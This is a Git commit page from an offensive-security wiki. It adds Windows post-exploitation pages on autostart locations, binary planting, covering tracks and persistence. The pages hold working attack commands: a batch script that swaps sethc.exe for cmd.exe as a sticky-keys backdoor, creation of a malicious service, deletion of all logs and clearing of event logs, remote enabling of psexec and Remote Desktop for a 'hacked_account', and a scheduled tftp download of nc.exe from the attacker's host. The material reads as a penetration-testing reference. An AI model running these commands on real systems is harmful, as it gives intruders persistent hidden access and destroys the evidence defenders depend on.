weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #54 from pwnwiki/ames_content

Browse Source 
Linking fixes, content fixes and content addition - Ames
This commit is contained in:
Rob Fuller 2013-12-29 07:56:06 -08:00
commit 8c04d9e203
7 changed files with 274 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

94
persistence/windows/autostart.md Normal file
View File

@ -0,0 +1,94 @@
## Windows Autostart Locations
### Folders
| Location | Operating System |
| -------- | ---------------- |
| `%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\` | Windows NT 6.0, 6.1 |
| `%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\` | Windows 5.0, 5.1, 5.2 |
| `%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\` | Windows 9x |
| `%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\` | Windows NT 3.50, 3.51, 4.0 |
| `User\Startup\` | |
| `%windir%\Start Menu\Programs\Startup\` | |
| `%windir%\Tasks\` | |
| `%windir%\system\iosubsys\` | |
| `%windir%\system\vmm32\` | |
### Files
| Location | Operating System |
| -------- | ---------------- |
| `%windir%\dosstart.bat` | |
| `%windir%\system.ini` - [boot] "scrnsave.exe" | |
| `%windir%\system.ini` - [boot] "shell" | |
| `%windir%\system\autoexec.nt` | |
| `%windir%\system\config.nt` | |
| `%windir%\win.ini` - [windows] "load" | |
| `%windir%\win.ini` - [windows] "run" | |
| `%windir%\wininit.ini` | |
| `%windir%\winstart.bat` | |
| `c:\autoexec.bat` | |
| `c:\config.sys` | |
| `c:\explorer.exe` | |
### Registry
| Location | Function |
| -------- | -------- |
| `%windir%\dosstart.bat` | |
| `HKEY_CLASSES_ROOT\batfile\shell\open\command\` | Executed whenever a .BAT file (Batch Command) is run. |
| `HKEY_CLASSES_ROOT\comfile\shell\open\command\` | Executed whenever a .COM file (Command) is run. |
| `HKEY_CLASSES_ROOT\exefile\shell\open\command\` | Executed whenever a .EXE file (Executable) is run. |
| `HKEY_CLASSES_ROOT\jsefile\shell\open\command\` | Executed whenever a .JSE file (Encoded Javascript) is run. |
| `HKEY_CLASSES_ROOT\jsfile\shell\open\command\` | Executed whenever a .JS file (Javascript) is run. |
| `HKEY_CLASSES_ROOT\piffile\shell\open\command\` | Executed whenever a .PIF file (Portable Interchange Format) is run. |
| `HKEY_CLASSES_ROOT\scrfile\shell\open\command\` | Executed whenever a .SCR file (Screen Saver) is run. |
| `HKEY_CLASSES_ROOT\vbefile\shell\open\command\` | Executed whenever a .VBE file (Encoded Visual Basic Script) is run. |
| `HKEY_CLASSES_ROOT\vbsfile\shell\open\command\` | Executed whenever a .VBS file (Visual Basic Script) is run. |
| `HKEY_CLASSES_ROOT\wsffile\shell\open\command\` | Executed whenever a .WSF file (Windows Scripting File) is run. |
| `HKEY_CLASSES_ROOT\wshfile\shell\open\command\` | Executed whenever a .WSH file (Windows Scripting Host) is run. |
| `HKEY_CURRENT_USER\Control Panel\Desktop` | The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load` | Executed when the user logs in. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run` | Executed when the user logs in. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\` | Used only by Setup. Displays a progress dialog box as the keys are run one at a time. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\` | All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit` | Executed when a user logs in. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon` | The "Shell" value is monitored. This value is executed after you log in. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\` | All values in this key are executed as services, and then their autostart reference is deleted. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\` | All values in this key are executed as services. |
| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\` | Executed by explorer.exe as soon as it has loaded. |
| `HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline` | Executed when a 16-bit Windows executable is executed. |
| `HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline` | Executed when a 16-bit DOS application is executed. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` | The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\` | All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\` | Layered Service Providers, executed before user login. |
| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\` | Services marked to startup automatically are executed before user login. |
| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | Similar to the RunOnce key from HKEY_CURRENT_USER. |
| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\` | Similar to the Run key from HKEY_CURRENT_USER. |
## Windows Operating System Versions
From http://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx:
The following table summarizes the most recent operating system version numbers.
| Operating system | Version number |
| ---------------- | -------------- |
| Windows 8.1 | 6.3 |
| Windows Server 2012 R2 | 6.3 |
| Windows 8 | 6.2 |
| Windows Server 2012 | 6.2 |
| Windows 7 | 6.1 |
| Windows Server 2008 R2 | 6.1 |
| Windows Server 2008 | 6.0 |
| Windows Vista | 6.0 |
| Windows Server 2003 R2 | 5.2 |
| Windows Server 2003 | 5.2 |
| Windows XP 64-Bit Edition | 5.2 |
| Windows XP | 5.1 |
| Windows 2000 | 5.0 |
## References
A large portion of this content came from https://web.archive.org/web/20110203184210/http://www.easy-data.no/Autostart.html

11
persistence/windows/binary.md Normal file
View File

@ -0,0 +1,11 @@
# Windows Binary Planting
Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges.
| Command | Description / Importance |
| ------- | ------------------------ |
| `%SystemRoot%\System32\wbem\mof\` | Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vulnerability. |
| `echo $PATH` | Check the $PATH environmental variable. Some directories may be writable. See: https://www.htbridge.com/advisory/HTB23108 |
| `msiexec.exe` | Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. |
| `sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys` | Create malicious services. |
|<code>Replacing file as: sethc.exe<br>@echo off <br>c: > nul\\cd\ > nul\\cd %SYSTEMROOT%\System32\ > nul <br>if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul <br>cmd %SYSTEMROOT%\System32\cmdsys\ > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul <br>copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul <br>copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul<br>exit</code> | By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. |

74
persistence/windows/cover.md Normal file
View File

@ -0,0 +1,74 @@
<!-- Code for collapse and expand -->
<script type="text/javascript">
$(document).ready(function() {
$('div.view').hide();
$('div.slide').click(function() {
$(this).next('div.view').slideToggle('fast');
return false;
});
});
</script>
# Windows Covering Tracks Commands
Commands to run to clean up a system after you have exploited it and to reduce a target's ability to discover what you did while on their system and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
## del
### Delete Logs
* **Command with arguments**: `del %WINDIR%\*.log /a /s /q /f`
* **Description**: **MUST be run as an administrator**. Deletes all *.log files from the %WINDIR% directory.
* **Output**:
* NA
----
## wevtutil
### List Logs
* **Command with arguments**: `wevutil el`
* **Description**: Lists the different log files the system is keeping. More information can be found http://technet.microsoft.com/en-us/library/cc732848(WS.10).aspx
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>C:\Users\johndoe>wevtutil el
Application
DFS Replication
Directory Service
DNS Server
File Replication Service
HardwareEvents
Internet Explorer
Key Management Service
Security
System
ThinPrint Diagnostics
EndpointMapper
ForwardedEvents
Microsoft-Windows-ADSI/Debug
Microsoft-Windows-Bits-Client/Analytic
Microsoft-Windows-Bits-Client/Operational
Microsoft-Windows-CAPI2/Operational
Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational
Microsoft-Windows-CodeIntegrity/Operational
Microsoft-Windows-CodeIntegrity/Verbose
Microsoft-Windows-COM/Analytic
Microsoft-Windows-CorruptedFileRecovery-Client/Operational
Microsoft-Windows-CorruptedFileRecovery-Server/Operational
Microsoft-Windows-CredUI/Diagnostic
Microsoft-Windows-DateTimeControlPanel/Analytic
Microsoft-Windows-DateTimeControlPanel/Debug
Microsoft-Windows-DateTimeControlPanel/Operational
Microsoft-Windows-DCLocator/Debug
Microsoft-Windows-Diagnosis-DPS/Analytic
Microsoft-Windows-Diagnosis-DPS/Debug
Microsoft-Windows-Diagnosis-DPS/Operational
Microsoft-Windows-Diagnosis-MSDT/Debug
Microsoft-Windows-Diagnosis-MSDT/Operational
Microsoft-Windows-Diagnosis-PLA/Debug
Microsoft-Windows-Diagnosis-PLA/Operational
Microsoft-Windows-Diagnosis-WDI/Debug
Microsoft-Windows-Diagnostics-Networking/Debug
[...snip...]</code></div>
### Clear Logs
* **Command with arguments**: `wevtutil cl [LOGNAME]`
* **Description**: **MUST be run as an administrator**. Clears the contents of a specific log.
* **Output**:
* <div class="slide" style="cursor: pointer;"> **Windows 2008:** Show/Hide</div><div class="view"><code>c:\temp>wevtutil cl Microsoft-Windows-EventLog/Debug</code></div>

76
persistence/windows/general.md Normal file
View File

@ -0,0 +1,76 @@
<!-- Code for collapse and expand -->
<script type="text/javascript">
$(document).ready(function() {
$('div.view').hide();
$('div.slide').click(function() {
$(this).next('div.view').slideToggle('fast');
return false;
});
});
</script>
# Windows General Persistence Commands
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt.
### Enable `psexec`
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
``c:\> net use \\[TargetIP]\ipc$ username /user:password
c:\> sc \\[TargetIP] config netdde start= auto
c:\> sc \\[TargetIP] config netddedsdm start= auto
c:\> sc \\[TargetIP] config clipsrv start= auto
c:\> sc \\[TargetIP] start netdde
c:\> sc \\[TargetIP] start netddedsdm
c:\> sc \\[TargetIP] start clipsrv
``
### Enable Remote Desktop
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system.
<pre>
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights] [Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
</pre>
1. Create another file named `enable_ts.reg` containing the contents below.
<pre>
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
</pre>
1. On the remote system, execute the following commands:
``c:\> sc config termservice start= auto sc config termservice start= auto
c:\> regedit /s enable_ts.reg
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
c:\> gpupdate /Force
c:\> net start "terminal services"
``
### Scheduler
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
``c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 pm command
``
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`

8
persistence/windows/index.md Normal file
View File

@ -0,0 +1,8 @@
# Windows Persistence Commands
Commands that help you maintain control over a compromised system.
* [Autostart Locations](autostart.md) - Where are the locations that will cause some command to auto-start on boot.
* [Binary Planting](binary.md) - Putting binary files in certain places.
* [Covering Tracks](cover.md) - Covering your tracks.
* [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system.

6
pivoting/windows/index.md Executable file
View File

@ -0,0 +1,6 @@
# Windows Pivoting Commands
Commands that help you pivot to other systems from a compromised system.
* [Networking Commands](windows_cmd_network.md) - Gathering system information about network interfaces and such.
* [Remote Movement](remote.md) - Commands that move data and files between systems on a network.

11
presence/windows/index.md
View File

@ -1,8 +1,7 @@
# Windows CMD Commands # Windows Presence Commands
Command that can be executed from the context of the CMD.exe prompt. Command that can be executed from the context of the CMD.exe prompt that help gain insight into the configuration of the target.
* [Config Commands](windows_cmd_config.md) - Commands that display information about the configuration of the victim.
* [Network Commands](windows_cmd_network.md) - Commands used for gathering information about the network settings and connections of a system.
* [Remote Acccess Commands](windows_cmd_remote.md) - Commands to remotely administer systems.
* [Blind Files](blind.md) - Files to look for on the system.
* [Config](windows_cmd_config.md) - Commands that display information about the configuration of the victim.
* [Finding Files](find_files.md) - How to search for files.